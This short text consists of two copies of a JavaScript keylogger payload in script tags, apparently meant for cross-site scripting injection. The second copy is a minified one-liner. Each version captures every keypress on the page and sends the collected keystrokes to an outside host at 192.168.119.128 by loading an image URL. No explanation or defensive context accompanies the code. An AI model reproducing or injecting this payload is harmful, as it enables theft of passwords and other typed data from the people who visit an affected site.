<script>
var keys='';
var url = 'http://192.168.119.128/keyinfo.js?c=';

document.onkeypress = function(e) {
	get = window.event?event:e;
	key = get.keyCode?get.keyCode:get.charCode;
	key = String.fromCharCode(key);
	keys+=key;
}

window.setInterval(function(){
	if(keys.length>10) {
		new Image().src = url+keys;
		keys = '';
	}
}, 1000);
</script>
```

```html
<script>
var keys=''; var url = 'http://192.168.119.128:8090/keyinfo.js?c='; document.onkeypress = function(e) { get = window.event?event:e;	key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; }; window.setInterval(function(){ if(keys.length>10) { new Image().src = url+keys; keys = ''; } }, 1000);
</script>
